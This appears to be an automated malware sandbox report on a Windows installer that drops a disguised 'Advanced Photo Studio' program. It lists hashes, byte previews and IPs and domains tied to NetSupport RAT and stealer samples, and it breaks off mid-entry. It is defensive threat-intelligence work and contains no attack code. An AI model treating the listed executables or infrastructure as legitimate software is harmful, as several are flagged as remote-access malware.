                                                                                    HCA Information:Failed
                                                                                    Cookbook Comments:
                                                                                    • Found application associated with file extension: .exe

                                                                                    Warnings

                                                                                    • Exclude process from analysis (whitelisted): MpCmdRun.exe, dllhost.exe, WMIADAP.exe, SIHClient.exe, conhost.exe
                                                                                    • Excluded IPs from analysis (whitelisted): 172.202.163.200, 13.107.246.63
                                                                                    • Excluded domains from analysis (whitelisted): ocsp.digicert.com, slscr.update.microsoft.com, ocsps.ssl.com, otelrules.azureedge.net, ctldl.windowsupdate.com, fe3cr.delivery.mp.microsoft.com
                                                                                    • Not all processes where analyzed, report is missing behavior information
                                                                                    • Report size exceeded maximum capacity and may have missing disassembly code.
                                                                                    • Report size getting too big, too many NtOpenKeyEx calls found.
                                                                                    • Report size getting too big, too many NtProtectVirtualMemory calls found.
                                                                                    • Report size getting too big, too many NtQueryValueKey calls found.

                                                                                    Simulations

                                                                                    Behavior and APIs

                                                                                    TimeTypeDescription
                                                                                    05:51:33API Interceptor17x Sleep call for process: DisplayPhotoViewer.exe modified

                                                                                    Joe Sandbox View / Context

                                                                                    IPs

                                                                                    MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                    104.26.1.2315q1Wm5VlqL.exeGet hashmaliciousNetSupport RATBrowse
                                                                                    • geo.netsupportsoftware.com/location/loca.asp
                                                                                    Update.jsGet hashmaliciousNetSupport RATBrowse
                                                                                    • geo.netsupportsoftware.com/location/loca.asp
                                                                                    file.exeGet hashmaliciousNetSupport RATBrowse
                                                                                    • geo.netsupportsoftware.com/location/loca.asp
                                                                                    Pyyidau.vbsGet hashmaliciousNetSupport RATBrowse
                                                                                    • geo.netsupportsoftware.com/location/loca.asp
                                                                                    file.exeGet hashmaliciousNetSupport RATBrowse
                                                                                    • geo.netsupportsoftware.com/location/loca.asp
                                                                                    file.exeGet hashmaliciousNetSupport RATBrowse
                                                                                    • geo.netsupportsoftware.com/location/loca.asp
                                                                                    CiscoSetup.exeGet hashmaliciousNetSupport RAT, NetSupport DownloaderBrowse
                                                                                    • geo.netsupportsoftware.com/location/loca.asp
                                                                                    Advanced_IP_Scanner_2.5.4594.12.exeGet hashmaliciousNetSupport RAT, NetSupport DownloaderBrowse
                                                                                    • geo.netsupportsoftware.com/location/loca.asp
                                                                                    Advanced_IP_Scanner_2.5.4594.12.exeGet hashmaliciousNetSupport RAT, NetSupport DownloaderBrowse
                                                                                    • geo.netsupportsoftware.com/location/loca.asp
                                                                                    file.exeGet hashmaliciousNetSupport RATBrowse
                                                                                    • geo.netsupportsoftware.com/location/loca.asp

                                                                                    Domains

                                                                                    MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                    geo.netsupportsoftware.comlFxGd66yDa.exeGet hashmaliciousNetSupport RATBrowse
                                                                                    • 104.26.0.231
                                                                                    Jjv9ha2GKn.exeGet hashmaliciousNetSupport RAT, DarkTortillaBrowse
                                                                                    • 104.26.0.231
                                                                                    5q1Wm5VlqL.exeGet hashmaliciousNetSupport RATBrowse
                                                                                    • 104.26.1.231
                                                                                    Update.jsGet hashmaliciousNetSupport RATBrowse
                                                                                    • 104.26.1.231
                                                                                    file.exeGet hashmaliciousNetSupport RATBrowse
                                                                                    • 104.26.0.231
                                                                                    file.exeGet hashmaliciousNetSupport RATBrowse
                                                                                    • 104.26.1.231
                                                                                    Pyyidau.vbsGet hashmaliciousNetSupport RATBrowse
                                                                                    • 104.26.1.231
                                                                                    Pyyidau.vbsGet hashmaliciousNetSupport RATBrowse
                                                                                    • 104.26.0.231
                                                                                    file.exeGet hashmaliciousNetSupport RATBrowse
                                                                                    • 104.26.0.231

                                                                                    ASNs

                                                                                    MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                    CORENETUSxd.ppc.elfGet hashmaliciousMiraiBrowse
                                                                                    • 162.33.165.243
                                                                                    http://esaleerugs.comGet hashmaliciousUnknownBrowse
                                                                                    • 162.33.178.63
                                                                                    https://esaleerugs.comGet hashmaliciousUnknownBrowse
                                                                                    • 162.33.178.63
                                                                                    http://mcajijknegnbbga.topGet hashmaliciousUnknownBrowse
                                                                                    • 162.33.178.216
                                                                                    https://mercro.com/Get hashmaliciousUnknownBrowse
                                                                                    • 162.33.178.59
                                                                                    http://mercro.comGet hashmaliciousUnknownBrowse
                                                                                    • 162.33.178.59
                                                                                    la.bot.arm5.elfGet hashmaliciousMiraiBrowse
                                                                                    • 208.100.216.187
                                                                                    la.bot.arm5.elfGet hashmaliciousUnknownBrowse
                                                                                    • 69.72.73.31
                                                                                    http://tayakay.comGet hashmaliciousUnknownBrowse
                                                                                    • 162.33.178.75
                                                                                    https://tayakay.com/analytics.jsGet hashmaliciousUnknownBrowse
                                                                                    • 162.33.178.75
                                                                                    CLOUDFLARENETUSfile.exeGet hashmaliciousLummaC, Amadey, Credential Flusher, LummaC Stealer, Stealc, VidarBrowse
                                                                                    • 172.67.207.38
                                                                                    wN8pQhRNnu.exeGet hashmaliciousLummaCBrowse
                                                                                    • 172.67.179.207
                                                                                    AZCFTWko2q.exeGet hashmaliciousLummaCBrowse
                                                                                    • 172.67.207.38
                                                                                    I37faEaz1K.exeGet hashmaliciousLummaCBrowse
                                                                                    • 172.67.207.38
                                                                                    YbJEkgZ4z5.exeGet hashmaliciousLummaCBrowse
                                                                                    • 172.67.207.38
                                                                                    3cb2b5U8BR.exeGet hashmaliciousLummaCBrowse
                                                                                    • 172.67.207.38
                                                                                    afXf6ZiYTT.exeGet hashmaliciousLummaCBrowse
                                                                                    • 172.67.207.38
                                                                                    ZideZBMwUQ.exeGet hashmaliciousLummaCBrowse
                                                                                    • 172.67.207.38
                                                                                    hKyD3sj3Y9.exeGet hashmaliciousLummaCBrowse
                                                                                    • 172.67.207.38
                                                                                    P0w3gV5bH3.exeGet hashmaliciousLummaCBrowse
                                                                                    • 104.21.64.1

                                                                                    JA3 Fingerprints

                                                                                    No context

                                                                                    Dropped Files

                                                                                    MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                    C:\Users\user\AppData\Local\Programs\Advanced Photo Studio\MediaInfo.dllSecuriteInfo.com.Trojan.Win32.Agent.3214.8517.exeGet hashmaliciousPetite VirusBrowse
                                                                                      ClipPlusCommunitySetup_ns.msiGet hashmaliciousLummaC, Babadeda, LummaC Stealer, Petite VirusBrowse
                                                                                        ClipPlusCommunitySetup.msiGet hashmaliciousLummaC, Babadeda, LummaC Stealer, Petite VirusBrowse
                                                                                          SecuriteInfo.com.W32.AutoIt.TB.gen.Eldorado.23184.1036.exeGet hashmaliciousUnknownBrowse
                                                                                            a1RkNY3NwQ.exeGet hashmaliciousUnknownBrowse
                                                                                              C:\Users\user\AppData\Local\Programs\Advanced Photo Studio\FreeImage.dllClipPlusCommunitySetup_ns.msiGet hashmaliciousLummaC, Babadeda, LummaC Stealer, Petite VirusBrowse
                                                                                                ClipPlusCommunitySetup.msiGet hashmaliciousLummaC, Babadeda, LummaC Stealer, Petite VirusBrowse

                                                                                                  Created / dropped Files

                                                                                                  C:\Users\user\AppData\Local\3delite\Secondary Display Photo Viewer\DisplayPhotoViewer.ini

                                                                                                  Download File
                                                                                                  Process:C:\Users\user\AppData\Local\Programs\Advanced Photo Studio\DisplayPhotoViewer.exe
                                                                                                  File Type:Unicode text, UTF-16, little-endian text, with no line terminators
                                                                                                  Category:dropped
                                                                                                  Size (bytes):2
                                                                                                  Entropy (8bit):1.0
                                                                                                  Encrypted:false
                                                                                                  SSDEEP:3:Qn:Qn
                                                                                                  MD5:F3B25701FE362EC84616A93A45CE9998
                                                                                                  SHA1:D62636D8CAEC13F04E28442A0A6FA1AFEB024BBB
                                                                                                  SHA-256:B3D510EF04275CA8E698E5B3CBB0ECE3949EF9252F0CDC839E9EE347409A2209
                                                                                                  SHA-512:98C5F56F3DE340690C139E58EB7DAC111979F0D4DFFE9C4B24FF849510F4B6FFA9FD608C0A3DE9AC3C9FD2190F0EFAF715309061490F9755A9BFDF1C54CA0D84
                                                                                                  Malicious:false
                                                                                                  Reputation:high, very likely benign file
                                                                                                  Preview:..

                                                                                                  C:\Users\user\AppData\Local\Microsoft\Windows Media\12.0\WMSDKNS.DTD

                                                                                                  Download File
                                                                                                  Process:C:\Users\user\AppData\Local\Programs\Advanced Photo Studio\DisplayPhotoViewer.exe
                                                                                                  File Type:XML 1.0 document, ASCII text, with CRLF line terminators
                                                                                                  Category:dropped
                                                                                                  Size (bytes):498
                                                                                                  Entropy (8bit):5.103913616294899
                                                                                                  Encrypted:false
                                                                                                  SSDEEP:12:TMbhJpIO1mcROtW/yF0T8YA+it/0zsFE/TYEGs/4w:qhJ+CTRSnF1wlwFUY6
                                                                                                  MD5:90BE2701C8112BEBC6BD58A7DE19846E
                                                                                                  SHA1:A95BE407036982392E2E684FB9FF6602ECAD6F1E
                                                                                                  SHA-256:644FBCDC20086E16D57F31C5BAD98BE68D02B1C061938D2F5F91CBE88C871FBF
                                                                                                  SHA-512:D618B473B68B48D746C912AC5FC06C73B047BD35A44A6EFC7A859FE1162D68015CF69DA41A5DB504DCBC4928E360C095B32A3B7792FCC6A38072E1EBD12E7CBE
                                                                                                  Malicious:false
                                                                                                  Reputation:moderate, very likely benign file
                                                                                                  Preview:<?xml version="1.0" standalone="yes"?>..<!DOCTYPE document [..<!ELEMENT document (node*)>.. <!ATTLIST document WMSNameSpaceVersion CDATA "2.0">....<!ELEMENT node (node*)>.. <!ATTLIST node name CDATA #REQUIRED>.. <!ATTLIST node opcode ( create | remove | setval | clearval | rename | movebefore ) #REQUIRED>.. <!ATTLIST node secure ( true | false ) #IMPLIED>.. <!ATTLIST node type ( string | boolean | int32 | binary | int64 ) #IMPLIED>.. <!ATTLIST node value CDATA #IMPLIED>..]>..

                                                                                                  C:\Users\user\AppData\Local\Microsoft\Windows Media\12.0\WMSDKNS.XML

                                                                                                  Download File
                                                                                                  Process:C:\Users\user\AppData\Local\Programs\Advanced Photo Studio\DisplayPhotoViewer.exe
                                                                                                  File Type:exported SGML document, Unicode text, UTF-8 (with BOM) text, with CRLF line terminators
                                                                                                  Category:dropped
                                                                                                  Size (bytes):10191
                                                                                                  Entropy (8bit):4.792342140217129
                                                                                                  Encrypted:false
                                                                                                  SSDEEP:96:/YkZRAF6zyHUhm77yB1pZYCEnfHrHH7B6xTGH+YCLV3zwULJEYCJWyHBt3zwFRh+:/2FV0bBPCfUdY
                                                                                                  MD5:7050D5AE8ACFBE560FA11073FEF8185D
                                                                                                  SHA1:5BC38E77FF06785FE0AEC5A345C4CCD15752560E
                                                                                                  SHA-256:CB87767C4A384C24E4A0F88455F59101B1AE7B4FB8DE8A5ADB4136C5F7EE545B
                                                                                                  SHA-512:A7A295AC8921BB3DDE58D4BCDE9372ED59DEF61D4B7699057274960FA8C1D1A1DAFF834A93F7A0698E9E5C16DB43AF05E9FD2D6D7C9232F7D26FFCFF5FC5900B
                                                                                                  Malicious:false
                                                                                                  Reputation:moderate, very likely benign file
                                                                                                  Preview:.<document WMSNameSpaceVersion="2.0">.... <node name="Control Protocol" opcode="create" >.. <node name="Object Store" opcode="create" >.. <node name="RTSP" opcode="create" >.. <node name="CLSID" opcode="create" type="string" value="{308786f0-8b15-11d2-b25f-006097d2e41e}" />.. <node name="Enabled" opcode="create" type="int32" value="0x1" />.. <node name="Properties" opcode="create" >.. <node name="Protocol" opcode="create" type="string" value="RTSP,RTSPA,RTSPT,RTSPU,RTSPM" />.. </node> Properties -->.... </node> RTSP -->.... <node name="Sessionless Multicast" opcode="create" >.. <node name="CLSID" opcode="create" type="string" value="{f9377800-f38d-11d2-b26c-006097d2e41e}" />.. <node name="Enabled" opcode="create" type="int32" value="0x1" />.. <node name="Properties" opcode="create" >.. <node name="Protocol" opcode="create" type="string" value="MCAST,RTP" />.. </node> Properties

                                                                                                  C:\Users\user\AppData\Local\Microsoft\Windows Media\12.0\WMSDKNS.XML.bak

                                                                                                  Download File
                                                                                                  Process:C:\Users\user\AppData\Local\Programs\Advanced Photo Studio\DisplayPhotoViewer.exe
                                                                                                  File Type:exported SGML document, Unicode text, UTF-8 (with BOM) text, with CRLF line terminators
                                                                                                  Category:dropped
                                                                                                  Size (bytes):10191
                                                                                                  Entropy (8bit):4.792342140217129
                                                                                                  Encrypted:false
                                                                                                  SSDEEP:96:/YkZRAF6zyHUhm77yB1pZYCEnfHrHH7B6xTGH+YCLV3zwULJEYCJWyHBt3zwFRh+:/2FV0bBPCfUdY
                                                                                                  MD5:7050D5AE8ACFBE560FA11073FEF8185D
                                                                                                  SHA1:5BC38E77FF06785FE0AEC5A345C4CCD15752560E
                                                                                                  SHA-256:CB87767C4A384C24E4A0F88455F59101B1AE7B4FB8DE8A5ADB4136C5F7EE545B
                                                                                                  SHA-512:A7A295AC8921BB3DDE58D4BCDE9372ED59DEF61D4B7699057274960FA8C1D1A1DAFF834A93F7A0698E9E5C16DB43AF05E9FD2D6D7C9232F7D26FFCFF5FC5900B
                                                                                                  Malicious:false
                                                                                                  Reputation:moderate, very likely benign file
                                                                                                  Preview:.<document WMSNameSpaceVersion="2.0">.... <node name="Control Protocol" opcode="create" >.. <node name="Object Store" opcode="create" >.. <node name="RTSP" opcode="create" >.. <node name="CLSID" opcode="create" type="string" value="{308786f0-8b15-11d2-b25f-006097d2e41e}" />.. <node name="Enabled" opcode="create" type="int32" value="0x1" />.. <node name="Properties" opcode="create" >.. <node name="Protocol" opcode="create" type="string" value="RTSP,RTSPA,RTSPT,RTSPU,RTSPM" />.. </node> Properties -->.... </node> RTSP -->.... <node name="Sessionless Multicast" opcode="create" >.. <node name="CLSID" opcode="create" type="string" value="{f9377800-f38d-11d2-b26c-006097d2e41e}" />.. <node name="Enabled" opcode="create" type="int32" value="0x1" />.. <node name="Properties" opcode="create" >.. <node name="Protocol" opcode="create" type="string" value="MCAST,RTP" />.. </node> Properties

                                                                                                  C:\Users\user\AppData\Local\Microsoft\Windows Media\12.0\WMSDKNSD.XML

                                                                                                  Download File
                                                                                                  Process:C:\Users\user\AppData\Local\Programs\Advanced Photo Studio\DisplayPhotoViewer.exe
                                                                                                  File Type:ASCII text, with CRLF line terminators
                                                                                                  Category:dropped
                                                                                                  Size (bytes):53
                                                                                                  Entropy (8bit):4.66869469064966
                                                                                                  Encrypted:false
                                                                                                  SSDEEP:3:sLRaE92JWyhHX9ovy4dduRun:sLzTyRXKvndI0
                                                                                                  MD5:A9B5DA9AEC61657B32393D96217165F0
                                                                                                  SHA1:80B5C577155ACD269B450D70F6B2CBED693EDF49
                                                                                                  SHA-256:9F4611369CF65B33D886489B2486FCA7B1E83E0DC998D35B15B3AA4C8478A28D
                                                                                                  SHA-512:0B73B232C03FFD5CE526A1EDE481A57C753D15D9EE39D4247ABFA52819B59FA676C63E30825DAF233E3139038C353DF84D652C4CE2CB71A706DDDBDFE0C70335
                                                                                                  Malicious:false
                                                                                                  Preview:<document WMSNameSpaceVersion="2.0">....</document>..

                                                                                                  C:\Users\user\AppData\Local\Programs\Advanced Photo Studio\CRM\Deployment.db

                                                                                                  Download File
                                                                                                  Process:C:\Users\user\AppData\Local\Programs\Advanced Photo Studio\DisplayPhotoViewer.exe
                                                                                                  File Type:data
                                                                                                  Category:modified
                                                                                                  Size (bytes):5374844
                                                                                                  Entropy (8bit):7.999225815226051
                                                                                                  Encrypted:true
                                                                                                  SSDEEP:98304:5EizXILuNATgrvUxj0W6RaECRe8+LxKNVEJMjbtA5Joe5b/1qzoWl3:5EIXkSrWj01aECbJu5JT5b6
                                                                                                  MD5:2032BA4077E20E526DFA680DC34A523E
                                                                                                  SHA1:816D5F6AC9D3F7688CD12AC737FBA026B65DC868
                                                                                                  SHA-256:B29882E9AE0CC3DB866A37153389E6C92A67298A5971187C59433DF55782D153
                                                                                                  SHA-512:0A2D1BC2FA7066BB64C308B05E3C67645B94FC18BCA27928D2D3DF697476B38899A46088EB6D4C1EE5A6311E1167B6EFE942B3EAD5FEE8236F04BF72ACAA1176
                                                                                                  Malicious:false
                                                                                                  Preview:..|...``..W/.Q.rW...................................1012546698.?=<>/! #awi{bLXGETAJ@%~70VTWVXX[Z.Y_^@HCBEqu.xxs}xHONqqsru.rvyysz}|JFYTZPVSbfihjjml.k...............s.............................W.......................$.......................'........................................................................48;:<<?>.%#"$,'&)AE^H^AO=^SRUUWVY.^Z]]W^A@wpruqvqqDJMLNNqp.wutv~yx{........redggihk.hloi....................q..................................................................m................]................|.w.t.c.x.>.A.j.r.l.k.b.}.W.~.n.G0V2"476,8;:.:?>#.#"%.'V)Z+E-K/\Q1S?U0W7Y,[;]y_.A5C1E+G(I-K>M.O:q.s.u.wnyx{z}|..d`cbedgfphkjulon....................................................?.........................................b.................(k"t"gq}ibmk.rpss;50tqbh08.9...1(325.2699.:=<.Fc.ggAACd....O.Jhf.`.ml1anao.d.ji.yzz .%qWHKJULON.usrtVwvy,./E=,....22V?Q\0.S'$.).................................................................B.....

                                                                                                  C:\Users\user\AppData\Local\Programs\Advanced Photo Studio\DisplayPhotoViewer.exe

                                                                                                  Download File
                                                                                                  Process:C:\Users\user\Desktop\Merge.exe
                                                                                                  File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                  Category:dropped
                                                                                                  Size (bytes):7058272
                                                                                                  Entropy (8bit):5.8675494163486315
                                                                                                  Encrypted:false
                                                                                                  SSDEEP:98304:yvaWYw01QLUbjLgsRSczJhe1qbnu2OmwkTwuZOk1ViKv2:yChvVe1P2OmwYW
                                                                                                  MD5:F78F5CC0A0B3AF7AF5485BB47B4809C0
                                                                                                  SHA1:47D2C43F246E204733A09DFAA7E749B0C2860089
                                                                                                  SHA-256:86AE0078776C0411504CF97F4369512013306FCF568CC1DC7A07E180DDE08EDA
                                                                                                  SHA-512:31947C7D9748C079E6FB0A32E4465B3AFF1E10179F8F9DCC0D72E1A0752B205E0C09912B1A853FFB1A9F87E4741B187DB93D9540A7DC05844D01225B44B9BDAA
                                                                                                  Malicious:true
                                                                                                  Antivirus:
                                                                                                  • Antivirus: ReversingLabs, Detection: 0%
                                                                                                  Preview:MZP.....................@...............................................!..L.!..This program must be run under Win32..$7........................................................................................................................................PE..L...mz.f..................<..h/.....4-<......@<...@...........................n......^l...@......@...................@@.......?..7...pE...)...........k.`)...p@.(............................`@.......................?......0@.Z....................text.....;.......;................. ..`.itext...@....;..B....;............. ..`.data........@<......"<.............@....bss....`....`=..........................idata...7....?..8...8=.............@....didata.Z....0@......p=.............@....edata.......@@......~=.............@..@.tls....T....P@..........................rdata..]....`@.......=.............@..@.reloc..(....p@.......=.............@..B.rsrc.....)..pE...)..~B.............@..@..............n.......k.............@..@................

                                                                                                  C:\Users\user\AppData\Local\Programs\Advanced Photo Studio\FilesystemDialogs.dll

                                                                                                  Download File
                                                                                                  Process:C:\Users\user\Desktop\Merge.exe
                                                                                                  File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                                                  Category:dropped
                                                                                                  Size (bytes):16200536
                                                                                                  Entropy (8bit):6.701432765203893
                                                                                                  Encrypted:false
                                                                                                  SSDEEP:196608:8ZiDmuWcyVooR0/8r8tR/1In6kXGej6p5szbxmE+/k7nUetypJ:8ZifWceooR0/W8P1neNCszyk7htyT
                                                                                                  MD5:7BCB496ECA53CCFAC7C6CFB9802C4BB1
                                                                                                  SHA1:F4F82664848F5C3ACA0E7C275F238CF9B9449D26
                                                                                                  SHA-256:979A53F54D540C3B8A3D1D8FF9A138912B351D1E5C48E98273A170668883F594
                                                                                                  SHA-512:FFDF9EC47B467CA94E5B7F27C77DC68AA0500A8406B4726C1432C4DDBEDBFD576A7938F2A6D2EECA7AF2D49C6C22757E9E9A9DF62AB0DEE5D271135D3C305AF4
                                                                                                  Malicious:false
                                                                                                  Antivirus:
                                                                                                  • Antivirus: ReversingLabs, Detection: 3%
                                                                                                  Preview:MZP.....................@...............................................!..L.!..This program must be run under Win32..$7........................................................................................................................................PE..L......e...........!......_..F........_......._....0.........................0............@..........................Pe.J.....d..C....l..H..............X)...pe.\h....................................................d.@.....d..a...................text...<y_......z_................. ..`.itext...D...._..F...~_............. ..`.data........._......._.............@....bss.........`..........................idata...C....d..D....`.............@....didata..a....d..b....`.............@....edata..J....Pe......Ta.............@..@.rdata..E....`e......Va.............@..@.reloc..\h...pe..j...Xa.............@..B.rsrc....H....l..H....h.............@..@.............0......................@..@........................................................

                                                                                                  C:\Users\user\AppData\Local\Programs\Advanced Photo Studio\FreeImage.dll

                                                                                                  Download File
                                                                                                  Process:C:\Users\user\Desktop\Merge.exe
                                                                                                  File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                                                  Category:dropped
                                                                                                  Size (bytes):6018560
                                                                                                  Entropy (8bit):6.382128994504564
                                                                                                  Encrypted:false
                                                                                                  SSDEEP:49152:hYvd3ZCYxG5Y1iztWwrOWSiCNFg7GXSv5HZXCiIQW9TgxB/cA+lb2XzGRlKR:hA53mIwvFnMiIMRDslK
                                                                                                  MD5:33082BF128B1700BE41BBC0377520ABB
                                                                                                  SHA1:B8AA3500D08ED31CDB13313311496E6E706967F3
                                                                                                  SHA-256:F5914CF345F20177203E72987ECA4A442DDD50934EB6273AA433C177E9640A41
                                                                                                  SHA-512:F513AF6CDC480A4E0963976618FFA95763960311E257478FCB06B0210AB12704E53D5BCCDF1D9331481ACC10B819661C5C36DF62D69610AA206678DA302A5251
                                                                                                  Malicious:false
                                                                                                  Antivirus:
                                                                                                  • Antivirus: ReversingLabs, Detection: 0%
                                                                                                  Joe Sandbox View:
                                                                                                  • Filename: ClipPlusCommunitySetup_ns.msi, Detection: malicious, Browse
                                                                                                  • Filename: ClipPlusCommunitySetup.msi, Detection: malicious, Browse
                                                                                                  Preview:MZ......................@................................... ...........!..L.!This program cannot be run in DOS mode....$........~.....]...]...].}.\...].}.\S..].}.\...].}.\...]...]...]..H]...].y.\...].y.\...].y.\...].x.\...].x.\D..].x.\...].x.\...].xp]...].x.\...]Rich...]................PE..L....`[...........!......*..\1......E'.......*..............................@\.....................................P|A..'..`.A.<.....Z.......................Z.|k...I@.8....................I@.....HI@.@.............*..............................text.....*.......*................. ..`.rdata........*.......*.............@..@.data.........A.......A.............@..._RDATA........Z......\Z.............@..@.rsrc.........Z......dZ.............@..@.reloc..|k....Z..l...jZ.............@..B................................................................................................................................................................................................................................

                                                                                                  C:\Users\user\AppData\Local\Programs\Advanced Photo Studio\JEncrypt.dll

                                                                                                  Download File
                                                                                                  Process:C:\Users\user\Desktop\Merge.exe
                                                                                                  File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                                                  Category:dropped
                                                                                                  Size (bytes):21323992
                                                                                                  Entropy (8bit):6.818517428709818
                                                                                                  Encrypted:false
                                                                                                  SSDEEP:393216:PGJ1NrRG+kXqalD2yE/KusyPGvVVoFqq5drB0Vr8bff6eT/Mc1ItdlIWONLAA4EB:+J11tOD4sbVD+
                                                                                                  MD5:849C3F4B28EB18B791695D08C407A543
                                                                                                  SHA1:15568664F0914AA6EBC33B3A9430E302F52BDDB6
                                                                                                  SHA-256:6B8E41EA8B38426749E7A41BF7BBDACA1CF083B59B0A512C24C242E74F540227
                                                                                                  SHA-512:E19BD0329FC770F8C8DB2C3E674BC7699DA66870903345998CF451A2CE587F5859E74C7AA22ADBC74E0417D81A6B8023A32282BABBD11553D61C55C9A6BF372E
                                                                                                  Malicious:false
                                                                                                  Antivirus:
                                                                                                  • Antivirus: ReversingLabs, Detection: 8%
                                                                                                  Preview:MZ......................@...................................P...........!..L.!This program cannot be run in DOS mode....$.......9-O.}L!.}L!.}L!.64".KL!.64$.L!.64%.SL!.m...zL!.m.%.iL!.m.".cL!.m.$..L!.k.%.cL!..%..O!..$..L!.}L!.FL!.6.%.[M!.5.$.M!.5.%..L!.64 .dL!.}L ..M!.6.(.|L!.6.!.|L!.6...|L!.6.#.|L!.Rich}L!.........................PE..L......g...........!...).....6......VQz.......................................M.....R.E...@..........................^$.d...D_$......................E..2...pH..i.... .8..................... ....... .@............................................text.............................. ..`.rdata..Zoj......pj.................@..@.data....,....$......h$.............@....rsrc................&.............@..@.reloc...i...pH..j....?.............@..B........................................................................................................................................................................................................................

                                                                                                  C:\Users\user\AppData\Local\Programs\Advanced Photo Studio\MediaInfo.dll

                                                                                                  Download File
                                                                                                  Process:C:\Users\user\Desktop\Merge.exe
                                                                                                  File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                                                  Category:dropped
                                                                                                  Size (bytes):5179840
                                                                                                  Entropy (8bit):6.683891814956787
                                                                                                  Encrypted:false
                                                                                                  SSDEEP:49152:3BFjwPBDr3oUt9ulSQftFGuZXhTz6n5wJudOnMrSrDgn+2EmmLnLfKBbD2f5VAmk:3BFOB37tiftHxNz/BMrSrGByVAmYlmS1
                                                                                                  MD5:B38C9B2B76254FDF958769DB2B9242A8
                                                                                                  SHA1:B6374308A0338AAC7509FC547E07908B98800625
                                                                                                  SHA-256:4DC4B7FCAB02E7C53F69E5EC59EEFF60BE22BC1A7CCC7F0EF9828C9E3090FC91
                                                                                                  SHA-512:40D7BCC8F13A8A5F98843D10A92518E54279ED56CA010DDDF5EFE1A75C49703BC0BCDFA575E856ADC0853CBD03B0ECF1EE0FF245671C0EED555CCC31AB6D2EF9
                                                                                                  Malicious:false
                                                                                                  Antivirus:
                                                                                                  • Antivirus: ReversingLabs, Detection: 0%
                                                                                                  Joe Sandbox View:
                                                                                                  • Filename: SecuriteInfo.com.Trojan.Win32.Agent.3214.8517.exe, Detection: malicious, Browse
                                                                                                  • Filename: ClipPlusCommunitySetup_ns.msi, Detection: malicious, Browse
                                                                                                  • Filename: ClipPlusCommunitySetup.msi, Detection: malicious, Browse
                                                                                                  • Filename: SecuriteInfo.com.W32.AutoIt.TB.gen.Eldorado.23184.1036.exe, Detection: malicious, Browse
                                                                                                  • Filename: a1RkNY3NwQ.exe, Detection: malicious, Browse
                                                                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........o..........................7...........sl......sl......sl......am.......vv.............am..G...am......am........r.....am......Rich....................PE..L....3.^...........!......:..X........3.......:..............................PO.......O...@...........................K......K.(....`L...............N..!...pL..... lG......................lG.....@lG.@.............:.|............................text...?.:.......:................. ..`.rdata..2.....:.......:.............@..@.data........K..~....K.............@....rsrc........`L.......L.............@..@.reloc.......pL.......L.............@..B................................................................................................................................................................................................................................................................................

                                                                                                  C:\Users\user\AppData\Local\Programs\Advanced Photo Studio\RwcTouch.dll

                                                                                                  Download File
                                                                                                  Process:C:\Users\user\Desktop\Merge.exe
                                                                                                  File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                                                  Category:dropped
                                                                                                  Size (bytes):2687128
                                                                                                  Entropy (8bit):6.401769930397263
                                                                                                  Encrypted:false
                                                                                                  SSDEEP:49152:0J5LI+2lf2H2WrFrVUScpLeE5ZyjEWOVshv81EHDF6WKpQeJCPhDt/9KtvAj9nLg:2USAsS1EHDF6WKwJBFKtvuE
                                                                                                  MD5:92DDF7FD13FB43EBD9D0008CC7DFD5A8
                                                                                                  SHA1:E1990FD53A885806DB7375DD27D9761C43D68EC7
                                                                                                  SHA-256:3A38F912BF0F93E266AD7D2EC2A54416B10798F3A6C8EB58E393EB96EB0548FD
                                                                                                  SHA-512:C9103849807B6FF987C74FED9B57D703E5CDD8E2341A42D91D09FC477805C11C73CB60F11DDA357E858E535F64DB2E24D3377499B301DC8ACAA7F00E8F3FFC52
                                                                                                  Malicious:false
                                                                                                  Antivirus:
                                                                                                  • Antivirus: ReversingLabs, Detection: 4%
                                                                                                  Preview:MZ......................@...................................0...........!..L.!This program cannot be run in DOS mode....$.........A0../c../c../c..,b../c.**b../c..(b../cF-,b../cF-+b../cF-*b../c..+b../c..)b../c..*b&./c...b../c...c&./c.*&b@./c.*/b../c.*.c../c...c../c.*-b../cRich../c........................PE..L.....f...........!...(..#..........F!.......#...............................).....A.)...@......................... b'.P...pb'.h.....'...............(..(....'..>...i&.....................@j&.....(i&.@.............#.H............................text...\.#.......#................. ....rdata..h.....#.......#.............@..@.data...(.....'.."...p'.............@....rsrc.........'.......'.............@..@.reloc...>....'..@....'.............@..B........................................................................................................................................................................................................................................................

                                                                                                  C:\Users\user\AppData\Local\Programs\Advanced Photo Studio\Sales.sav

                                                                                                  Download File
                                                                                                  Process:C:\Users\user\Desktop\Merge.exe
                                                                                                  File Type:data
                                                                                                  Category:dropped
                                                                                                  Size (bytes):5374602
                                                                                                  Entropy (8bit):7.999225783320548
                                                                                                  Encrypted:true
                                                                                                  SSDEEP:98304:3EizXILuNATgrvUxj0W6RaECRe8+LxKNVEJMjbtA5Joe5b/1qzoWlE:3EIXkSrWj01aECbJu5JT5b9
                                                                                                  MD5:9039C30D9218BBDCCD365E3B09134085
                                                                                                  SHA1:E8BA1634C798FE66FF9EC8D7A04A71D75CE15843
                                                                                                  SHA-256:32684BD13BF3DEB98F8604E1F885DBF427C819208B8376DE7F60C49FF78686D5
                                                                                                  SHA-512:01AD5186B2EECAFEC69E95E0974D0FA45FBEE8BC80943EB8DF55389F9225B178F19112F842E48C776C59B7092AD4679CEB619C204BB0F54C2A8C0A8D62A646EC
                                                                                                  Malicious:false
